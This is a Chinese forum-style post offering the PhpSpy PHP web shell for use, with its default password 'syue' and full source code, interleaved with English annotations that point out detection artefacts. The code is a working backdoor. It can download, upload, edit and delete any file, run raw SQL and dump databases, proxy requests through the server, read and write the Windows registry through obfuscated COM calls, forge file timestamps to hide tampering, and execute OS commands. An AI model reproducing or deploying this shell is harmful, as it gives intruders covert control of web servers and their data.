
一款不错的PHP木马,我自己也在用!

这个PHP木马还不错的。我自己也在用。默认密码是 syue

<?php

// Analyst annotation: bootstrap of a password-gated PHP web shell. The comments describe only
// what the visible code does and what a defender can look for.
// 7 = E_ERROR | E_WARNING | E_PARSE, so notices (e.g. undefined index) are not reported.
error_reporting(7);
ob_start();
// Request start time; debuginfo() later subtracts it to print the processing time.
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];

/*===================== Program configuration =====================*/

// Whether password verification is required: "1" enforces it; any other value lets every
// visitor straight in and the password below is ignored.
$admin['check'] = "1";

// Login password, kept in clear text in the file itself. The literal and the array key names
// are stable strings to search a web root for when hunting copies of this sample.
$admin['pass']  = "syue";

/*===================== End of configuration =====================*/


// Lets the program work in environments where register_globals = off
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

// Emulates register_globals: every POST field, then every GET field, becomes a global
// variable. EXTR_SKIP leaves already-defined variables (such as $admin) untouched, so POST wins
// over GET for the same name. Bare variables used later ($dir, $downfile, $delfile, ...) that
// are never assigned in the visible code come from here, i.e. straight from the request.
if ($onoff != 1) {
 @extract($_POST, EXTR_SKIP);
 @extract($_GET, EXTR_SKIP);
}

// Script URL path as reported by the server; echoed unescaped into HTML further down.
$self = $_SERVER['PHP_SELF'];
// Raw disable_functions setting; used to decide whether phpinfo() is offered.
$dis_func = get_cfg_var("disable_functions");


/*===================== Authentication =====================*/
// Runs only when $admin['check'] is "1".
if($admin['check'] == "1") {
 // Logout: overwrite the "adminpass" cookie with an empty value, then refresh after 3 seconds.
 if ($_GET['action'] == "logout") {
  setcookie ("adminpass", "");
  echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
  echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面 &gt;&gt;&gt;</a></span>";
  exit;
 }

 // Login attempt: the trimmed POST value is compared with loose "==" against the configured
 // password. On success the password itself is stored in the "adminpass" cookie for one day
 // (1*24*3600 seconds); no Secure/HttpOnly arguments are passed to setcookie().
 if ($_POST['do'] == 'login') {
  $thepass=trim($_POST['adminpass']);
  if ($admin['pass'] == $thepass) {
   setcookie ("adminpass",$thepass,time()+(1*24*3600));
   echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
   echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面 &gt;&gt;&gt;</a></span>";
   exit;
  }
 }
 // Every other request: the cookie must equal the configured password, otherwise loginpage()
 // prints the form and exits. Because the cookie value is the clear-text password, it is sent
 // with every authenticated request; where request cookies are recorded (proxy, WAF, packet
 // capture), an "adminpass" cookie sent to an unexpected .php file is a hunting signal.
 if (isset($_COOKIE['adminpass'])) {
  if ($_COOKIE['adminpass'] != $admin['pass']) {
   loginpage();
  }
 } else {
  loginpage();
 }
}
/*===================== End of authentication =====================*/

// Check the magic_quotes_gpc state and undo its escaping on GET/POST.
// get_magic_quotes_gpc() was removed in PHP 8, so this call is fatal on current interpreters.
if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
 $_POST = stripslashes_array($_POST);
}

// Show PHPINFO
// eregi() looks for "phpinfo" in disable_functions; when it is absent the full phpinfo() page
// is printed. eregi() itself was removed in PHP 7.
if ($_GET['action'] == "phpinfo") {
 echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
 exit;
}

// Online proxy
// Passes the "url" POST field to file_get_contents() unchecked and echoes the result, so the
// fetch is made by the web server itself. Outbound connections initiated by the PHP worker are
// the network-side artefact; egress filtering for the web tier and allow_url_fopen = Off limit
// what this branch can reach.
if (isset($_POST['url'])) {
 $proxycontents = @file_get_contents($_POST['url']);
 echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";
 exit;
}

// Download file
// $downfile is not assigned anywhere in the visible code; it arrives from the request
// (register_globals or the extract() emulation) -- the file listing builds "?downfile=" links.
// Any path readable by the web server account is streamed back as an attachment, so
// "downfile=" in access-log query strings is a direct indicator of use.
if (!empty($downfile)) {
 if (!@file_exists($downfile)) {
  echo "<script>alert('你要下的文件不存在!')</script>";
 } else {
  $filename = basename($downfile);
  // Extension = text after the last dot; it is copied into the Content-type header.
  $filename_info = explode('.', $filename);
  $fileext = $filename_info[count($filename_info)-1];
  header('Content-type: application/x-'.$fileext);
  header('Content-Disposition: attachment; filename='.$filename);
  header('Content-Description: PHP Generated Data');
  header('Content-Length: '.filesize($downfile));
  @readfile($downfile);
  exit;
 }
}

// Download a database backup directly
// Connection parameters ($servername, $dbusername, $dbpassword, $dbname) are request-supplied
// globals. The mysql_* extension used here was removed in PHP 7.
if ($_POST['backuptype'] == 'download') {
 @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
 @mysql_select_db($dbname) or die("选择数据库失败"); 
 // Flip the submitted table list so table names become keys for the isset() test below.
 $table = array_flip($_POST['table']);
 $result = mysql_query("SHOW tables");
 echo ($result) ? NULL : "出错: ".mysql_error();

 // Attachment name is derived from the Host header of the request.
 $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
 header('Content-type: application/unknown');
 header('Content-Disposition: attachment; filename='.$filename);
 $mysqldata = '';
 // sqldumptable() is defined outside the visible part of the file. Its return value is
 // collected in $mysqldata; no statement in this branch echoes that buffer before exit.
 while ($currow = mysql_fetch_array($result)) {
  if (isset($table[$currow[0]])) {
   $mysqldata.= sqldumptable($currow[0]);
   $mysqldata.= $mysqldata."\r\n";
  }
 }
 mysql_close();
 exit;
}

// Program directory (backslashes normalised to forward slashes)
$pathname=str_replace('\\','/',dirname(__FILE__));

// Resolve the current path
// $dir is request-controlled; nothing here confines it to the web root, and getPath()
// honours ".." segments.
if (!isset($dir) or empty($dir)) {
 $dir = ".";
 $nowpath = getPath($pathname, $dir);
} else {
 $dir=$_GET['dir'];
 $nowpath = getPath($pathname, $dir);
}

// Check read/write status
// dir_writeable() probes by opening "test.txt" for writing inside the directory and deleting
// it again (and tries mkdir with 0777 if the directory is missing). Merely browsing a
// directory therefore has file-system side effects, including removal of an existing test.txt.
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
// Menu entries that are only offered when usable: phpinfo (when not listed in
// disable_functions) and the registry page (Windows hosts only).
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">注册表操作</a>" : "";

// FORMS is an HTML helper class defined outside the visible part of the file.
$tb = new FORMS;

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>岁月联盟 Www.SYue.Com</title>
<style type="text/css">
body,td {
 font-family: "Tahoma";
 font-size: "12px";
 line-height: "150%";
}
.smlfont {
 font-family: "Tahoma";
 font-size: "11px";
}
.INPUT {
 FONT-SIZE: "12px";
 COLOR: "#000000";
 BACKGROUND-COLOR: "#FFFFFF";
 height: "18px";
 border: "1px solid #666666";
 padding-left: "2px";
}
.redfont {
 COLOR: "#A60000";
}
a:link,a:visited,a:active {
 color: "#000000";
 text-decoration: underline;
}
a:hover {
 color: "#465584";
 text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<SCRIPT language=JavaScript>
// Intended to copy the state of the "chkall" checkbox onto the form's controls. As printed,
// `e` is the whole form.elements collection on every iteration, not a single element.
function CheckAll(form) {
 for (var i=0;i<form.elements.length;i++) {
  var e = form.elements;
  if (e.name != 'chkall')
  e.checked = form.chkall.checked;
    }
}
// Shows confirmation message m, then navigates to "?dir=d&deldir=f" when t == 1 and to
// "?dir=d&delfile=f" otherwise. The PHP delete handlers read these GET parameters, so each
// deletion made through the panel appears as a query string in the access log.
function really(d,f,m,t) {
 if (confirm(m)) {
  if (t == 1) {
   window.location.href='?dir='+d+'&deldir='+f;
  } else {
   window.location.href='?dir='+d+'&delfile='+f;
  }
 }
}
</SCRIPT>
</head>

<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
// Banner row: prints the request's Host header and the client address unescaped.
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
// Navigation menu. The "?action=" values listed here (logout, dir, phpenv, proxy, shell, sql,
// sqlbak, plus reg/phpinfo when offered) are what show up in access-log query strings when the
// panel is used.
$tb->tdbody('<a href="?action=logout">注销会话</a> | <a href="?action=dir">返回PhpSpy目录</a> | <a href="?action=phpenv">PHP环境变量</a> | <a href="?action=proxy">在线代理</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
// Four small forms rendered through the FORMS helper (defined outside the visible code).
// 1) GET form: shows the script path, the current directory with its permission bits, and a
//    "dir" field for jumping to another directory.
$tb->headerform(array('method'=>'GET','content'=>'<p>程序路径: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->makeinput('dir').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗'));

// 2) multipart upload form: fields "uploadfile", "doupfile" and a hidden "uploaddir" that
//    carries the current directory.
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));

// 3) create-file form: posts "editfile"/"createfile" to ?action=editfile.
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit')));

// 4) create-directory form: fields "newdirectory" and "createdirectory".
$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== Action handlers: start =====================*/
// One if/elseif chain, so at most one action runs per request. The bare variables tested here
// ($delfile, $deldir, $createdirectory, $doupfile, ...) are request fields turned into globals
// by register_globals or the extract() emulation.
echo "<p><b>\n";
// Delete file: unlinks the request-supplied path as given.
if (!empty($delfile)) {
 if (file_exists($delfile)) {
  echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!";
 } else {
  echo basename($delfile)." 文件已不存在!";
 }
}

// Delete directory: recursive removal through deltree() of "$dir/$deldir".
elseif (!empty($deldir)) {
 $deldirs="$dir/$deldir";
 if (!file_exists("$deldirs")) {
  echo "$deldir 目录已不存在!";
 } else {
  echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!";
 }
}

// Create directory: created with mode 0777 and chmod'ed to 0777 again, so directories made
// through the panel are world-writable (subject to umask for the mkdir call).
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
 if (!empty($newdirectory)) {
  $mkdirs="$dir/$newdirectory";
  if (file_exists("$mkdirs")) {
   echo "该目录已存在!";
  } else {
   echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!";
   @chmod("$mkdirs",0777);
  }
 }
}

// Upload file: copies the temporary upload to "$uploaddir/<client-supplied name>" with no
// check on name, type or destination. New or changed files in web-served directories are the
// artefact; file-integrity monitoring on the web root is the matching control.
elseif ($doupfile) {
 echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!";
}

// Edit file: opens the request-supplied path with mode "w" (truncate/create) and writes the
// posted "filecontent" into it.
elseif ($_POST['do'] == 'doeditfile') {
 if (!empty($_POST['editfilename'])) {
  $filename="$editfilename";
  @$fp=fopen("$filename","w");
  echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
  @fclose($fp);
 } else {
  echo "请输入想要编辑的文件名!";
 }
}

// Edit file permissions: the posted octal string is converted to an integer and applied with
// chmod() to "$dir/$file".
elseif ($_POST['do'] == 'editfileperm') {
 if (!empty($_POST['fileperm'])) {
  $fileperm=base_convert($_POST['fileperm'],8,10);
  echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!";
  echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
 } else {
  echo "请输入想要设置的属性!";
 }
}

// Rename file: refuses when the target name already exists.
elseif ($_POST['do'] == 'rename') {
 if (!empty($_POST['newname'])) {
  $newname=$_POST['dir']."/".$_POST['newname'];
  if (@file_exists($newname)) {
   echo "".$_POST['newname']." 已经存在,请重新输入一个!";
  } else {
   echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!";
  }
 } else {
  echo "请输入想要改的文件名!";
 }
}

// Clone timestamp: copies the modification time of a reference file ("tarfile") onto
// "curfile" with touch(). Forensic consequence: mtime/atime of files on a host where this ran
// cannot be trusted on their own. On Unix-like systems touch() does not control the inode
// change time, so comparing ctime with mtime remains a useful triage check.
elseif ($_POST['do'] == 'domodtime') {
 if (!@file_exists($_POST['curfile'])) {
  echo "要修改的文件不存在!";
 } else {
  if (!@file_exists($_POST['tarfile'])) {
   echo "要参照的文件不存在!";
  } else {
   $time=@filemtime($_POST['tarfile']);
   echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
  }
 }
}

// Custom timestamp: same touch() call, with the time built by strtotime() from six posted
// fields. Nothing happens unless all six are non-empty.
elseif ($_POST['do'] == 'modmytime') {
 if (!@file_exists($_POST['curfile'])) {
  echo "要修改的文件不存在!";
 } else {
  $year=$_POST['year'];
  $month=$_POST['month'];
  $data=$_POST['data'];  
  $hour=$_POST['hour'];
  $minute=$_POST['minute'];
  $second=$_POST['second'];
  if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
   $time=strtotime("$data $month $year $hour:$minute:$second");
   echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
  }
 }
}

// Connect to MySQL: connection test only, using request-supplied host and credentials.
// All mysql_* calls in this file belong to the extension removed in PHP 7.
elseif ($connect) {
 if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
  echo "数据库连接成功!";
  mysql_close();
 } else {
  echo mysql_error();
 }
}

// Execute SQL statement: the posted "sql_query" string is sent to the server as-is; only
// success or the error text is reported, no result rows are printed here. Database-side query
// logging and least-privilege accounts for the web application bound what this can do.
elseif ($_POST['do'] == 'query') {
 @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
 @mysql_select_db($dbname) or die("选择数据库失败");
 $result = @mysql_query($_POST['sql_query']);
 echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error();
 mysql_close();
}

// Backup operation: only the 'server' backup type is handled in this branch. The selected
// tables are dumped through sqldumptable() (defined outside the visible code) into the file
// named by the request-supplied $path, and a link to that file is printed. A *.sql dump
// appearing inside the web root is the file artefact.
elseif ($_POST['do'] == 'backupmysql') {
 if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
  echo "请选择欲备份的数据表和备份方式!";
 } else {
  if ($_POST['backuptype'] == 'server') {
   @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
   @mysql_select_db($dbname) or die("选择数据库失败"); 
   // Table names become keys so the loop below can test membership with isset().
   $table = array_flip($_POST['table']);
   $filehandle = @fopen($path,"w");
   if ($filehandle) {
    $result = mysql_query("SHOW tables");
    echo ($result) ? NULL : "出错: ".mysql_error();
    while ($currow = mysql_fetch_array($result)) {
     if (isset($table[$currow[0]])) {
      sqldumptable($currow[0], $filehandle);
      fwrite($filehandle,"\n\n\n");
     }
    }
    fclose($filehandle);
    echo "数据库已成功备份到 <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
    mysql_close();
   } else {
    echo "备份失败,请确认目标文件夹是否具有可写权限!";
   }
  }
 }
}

// Packed download (the original author notes it can be very slow for large files)
// Thx : 小花
// $dl is the checkbox array from the file listing, keyed by file path. The keys are joined and
// split again into a plain list, handed to PHPZip (a class defined outside the visible code),
// and its ->out property is sent as an attachment named "<Host header>_Files.tar.gz". Large
// responses from an otherwise small .php file are the log-side artefact.
elseif($downrar) {
 if (!empty($dl)) {
  $dfiles="";
  foreach ($dl AS $filepath=>$value) {
   $dfiles.=$filepath.",";
  }
  $dfiles=substr($dfiles,0,strlen($dfiles)-1);
  $dl=explode(",",$dfiles);
  $zip=new PHPZip($dl);
  $code=$zip->out;  
  header("Content-type: application/octet-stream");
  header("Accept-Ranges: bytes");
  header("Accept-Length: ".strlen($code));
  header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
  echo $code;
  exit;
 } else {
  echo "请选择要打包下载的文件!";
 }
}

// Run a program through the Shell.Application COM object (Windows only; needs PHP's COM
// extension). The ProgID strings in this chain are assembled from fragments, presumably to
// defeat plain string matching -- detection rules should normalise string concatenation before
// matching. The "&new" syntax was removed in PHP 7.
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
 $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
 $a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
 echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!";
}

// Show the status of a PHP configuration directive via getphpcfg().
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
 echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}

// Read registry: RegRead on the posted value name through WScript.Shell; the result is
// var_dump'ed. Registry access by the web server process is unusual on most hosts and is worth
// alerting on.
elseif(($regread) AND !empty($_POST['readregname'])) {
 $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
 var_dump(@$shell->RegRead($_POST['readregname']));
}

// Write registry: RegWrite with the posted name, value and type.
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
 $shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
 $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
 echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!";
}

// Delete registry: RegDelete on the posted name.
elseif(($regdelete) AND !empty($_POST['delregname'])) {
 $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
 $a = @$shell->RegDelete($_POST['delregname']);
 echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!";
}

// No action requested: print the author credit line. Its text and URLs are fixed strings
// present in every response of an idle panel.
else {
 echo "本程序由 <a href=\"http://www.syue.com\" target=\"_blank\">Security Angel</a> 岁月联盟 [<a href=\"http://www.syue.com\" target=\"_blank\">SYUE</a>] 独立开发,可在 <a href=\"http://www.syue.com\" target=\"_blank\">www.syue.com</a> 下载最新版本.";
}

echo "</b></p>\n";
/*===================== Action handlers: end =====================*/

// Default view (no action, or action=dir): directory browser for $dir.
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
 $tb->tableheader();
?>
  <tr bgcolor="#cccccc">
    <td align="center" nowrap width="27%"><b>文件</b></td>
 <td align="center" nowrap width="16%"><b>创建日期</b></td>
    <td align="center" nowrap width="16%"><b>最后修改</b></td>
    <td align="center" nowrap width="11%"><b>大小</b></td>
    <td align="center" nowrap width="6%"><b>属性</b></td>
    <td align="center" nowrap width="24%"><b>操作</b></td>
  </tr>
<?php
// Directory list: first pass over $dir, printing sub-directories only.
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
 $filepath="$dir/$file";
 $a=@is_dir($filepath);
 if($a=="1"){
  if($file!=".." && $file!=".") {
   // ctime / mtime / permission bits of the sub-directory; names are printed unescaped.
   $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
   $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
   $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
   echo "<tr class=".getrowbg().">\n";
   echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
   echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
   echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
   echo "  <td align=\"center\" nowrap class=\"smlfont\">&lt;dir&gt;</td>\n";
   echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
   echo "  <td align=\"center\" nowrap><a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','你确定要删除 $file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!','1')\">删除</a></td>\n";
   echo "</tr>\n";
   $dir_i++;
  } else {
   // ".." gets a "parent directory" link; "." is skipped.
   if($file=="..") {
    echo "<tr class=".getrowbg().">\n";
    echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n";
    echo "</tr>\n";
   }
  }
 }
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
  <td colspan="6" height="5"></td>
</tr>
<FORM action="" method="POST">
<?
// File list: second pass over $dir, printing regular entries with size, timestamps,
// permission bits and per-file action links (download, edit, delete, rename, timestamp).
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
 $filepath="$dir/$file";
 $a=@is_dir($filepath);
 if($a=="0"){  
  // Size in KB with three decimals.
  $size=@filesize($filepath);
  $size=$size/1024 ;
  $size= @number_format($size, 3);
  // Files whose ctime differs from their mtime are shown in red -- the same ctime/mtime
  // comparison a responder would use to spot altered timestamps.
  if (@filectime($filepath) == @filemtime($filepath)) {
   $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
   $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
  } else {
   $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
   $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
  }
  @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
  echo "<tr class=".getrowbg().">\n";
  echo "  <td style=\"padding-left: 5px;\">";
  // Checkbox name "dl[<path>]" feeds the packed-download handler.
  echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
  echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
  echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
  echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
  echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
  echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
  echo "  <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','你确定要删除 $file 文件吗?','2')\">删除</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">时间</a></td>\n";
  echo "</tr>\n";
  $file_i++;
 }
}// while
@closedir($dirs);
// Footer row: "check all" box, the packed-download submit button and the directory/file counts.
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','选中文件打包下载','','submit').'</td><td align="right">'.$dir_i.' 个目录 / '.$file_i.' 个文件</td></tr></table>','center',getrowbg(),'','','6');

echo "</FORM>\n";
echo "</table>\n";
}// end dir

// action=editfile: renders the create/edit form. For an existing file the content is read and
// HTML-escaped for the textarea; when $newfile is set only the target name is prepared. The
// form posts do=doeditfile, which the write handler earlier in the script acts on.
elseif ($_GET['action'] == "editfile") {
 if(empty($newfile)) {
  $filename="$dir/$editfile";
  $fp=@fopen($filename,"r");
  $contents=@fread($fp, filesize($filename));
  @fclose($fp);
  $contents=htmlspecialchars($contents);
 }else{
  $editfile=$newfile;
  $filename = "$dir/$editfile";
 }
 $action = "?dir=".urlencode($dir)."&editfile=".$editfile;
 $tb->tableheader();
 $tb->formheader($action,'新建/编辑文件');
 $tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件');
 $tb->tdbody($tb->maketextarea('filecontent',$contents));
 $tb->makehidden('do','doeditfile');
 $tb->formfooter('1','30');
}//end editfile

// action=rename: renders the rename form. Hidden fields carry the old path ("oldname") and the
// directory; the form posts do=rename.
elseif ($_GET['action'] == "rename") {
 $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
 $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
 $tb->tableheader();
 $tb->formheader($action,'修改文件名');
 $tb->makehidden('oldname',$dir."/".$nowfile);
 $tb->makehidden('dir',$dir);
 $tb->tdbody('当前文件名: '.basename($nowfile));
 $tb->tdbody('改名为: '.$tb->makeinput('newname'));
 $tb->makehidden('do','rename');
 $tb->formfooter('1','30');
}//end rename

// action=fileperm: renders the permission form, prefilled with the current octal mode of
// "$dir/$file"; the form posts do=editfileperm.
elseif ($_GET['action'] == "fileperm") {
 $action = "?dir=".urlencode($dir)."&file=".$file;
 $tb->tableheader();
 $tb->formheader($action,'修改文件属性');
 $tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
 $tb->makehidden('file',$file);
 $tb->makehidden('dir',urlencode($dir));
 $tb->makehidden('do','editfileperm');
 $tb->formfooter('1','30');
}//end fileperm

// action=newtime: renders the two timestamp forms -- "clone from another file"
// (do=domodtime) and "set an explicit date/time" (do=modmytime). Both end in touch() in the
// handlers earlier in the script, i.e. they exist to alter a file's modification time.
elseif ($_GET['action'] == "newtime") {
 $action = "?dir=".urlencode($dir);
 // Month names for the select box; strtotime() later parses the chosen name.
 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
 $tb->tableheader();
 $tb->formheader($action,'克隆文件最后修改时间');
 $tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30');
 $tb->makehidden('do','domodtime');
 $tb->formfooter('','30');
 $tb->formheader($action,'自定义文件最后修改时间');
 $tb->tdbody('<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>','left');
 $tb->tdbody('当前文件名: '.$file);
 $tb->makehidden('curfile',$file);
 $tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
 $tb->makehidden('do','modmytime');
 $tb->formfooter('1','30');
}//end newtime

// action=shell: command-execution page. Every path through this block ends with the web
// server account starting an OS process, so a web server / PHP worker spawning cmd.exe or a
// shell is the host-side signal. Listing system, passthru, exec, shell_exec and popen in
// disable_functions removes the PHP-native branches; the COM branch exists only where PHP's
// Windows-only COM extension is loaded.
elseif ($_GET['action'] == "shell") {
 $action = "??action=shell&dir=".urlencode($dir);
 $tb->tableheader();
 $tb->tdheader('WebShell Mode');

 // Windows only: form for the output-less "programrun" handler. The prefilled defaults are
 // cmd.exe with arguments that redirect output to log.txt in the script's own directory; an
 // unexpected log.txt next to the script is a file artefact.
 if (substr(PHP_OS, 0, 3) == 'WIN') {
  $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
  $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
  echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
